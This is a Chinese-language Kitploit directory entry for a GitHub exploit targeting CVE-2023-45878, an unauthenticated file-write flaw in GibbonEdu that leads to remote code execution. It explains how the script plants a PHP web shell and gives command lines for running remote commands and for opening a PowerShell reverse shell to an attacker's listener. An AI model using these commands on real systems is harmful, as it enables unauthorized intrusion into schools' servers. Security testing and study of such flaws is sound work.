Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-45878 — GibbonEdu 任意文件写入致远程代码执行 | Kitploit
工具/GitHubGitHub/davidzzo23/cve-2023-45878
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubdavidzzo23/cve-2023-45878

CVE-2023-45878

GibbonEdu 任意文件写入致远程代码执行

查看仓库
3241年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-45878

GibbonEdu 任意文件写入到 Web Shell 执行

描述

本仓库包含针对 CVE-2023-45878 的利用代码,这是 GibbonEdu 中的一个任意文件写入漏洞。该漏洞影响 rubrics_visualise_saveAjax.php 端点,允许未经身份验证的攻击者向 Web 服务器上传任意文件。

此脚本利用该漏洞上传 PHP Web Shell,并可以选择:

  • 执行 特定系统命令;
  • 触发 Base64 编码的 PowerShell 反向 Shell 以获取远程访问权限。

用法

脚本支持两种操作模式:

  • --command (-c):远程执行特定系统命令。
  • --shell (-s):向攻击者监听器触发 PowerShell 反向 Shell。

如何运行利用脚本

1. 克隆仓库

git clone https://github.com/davidzzo23/CVE-2023-45878.git
cd CVE-2023-45878

2. 运行 Web Shell 利用脚本

  • 执行远程命令:
python3 CVE-2023-45878.py -t <目标域名> -c "whoami"
  • 触发 PowerShell 反向 Shell:
python3 CVE-2023-45878.py -t <目标域名> -s -i <IP地址> -p <端口>

免责声明

此脚本仅用于教育目的。未经许可在系统上使用此利用代码属于违法行为。作者不对因使用此代码造成的任何滥用或损害负责。

下载工具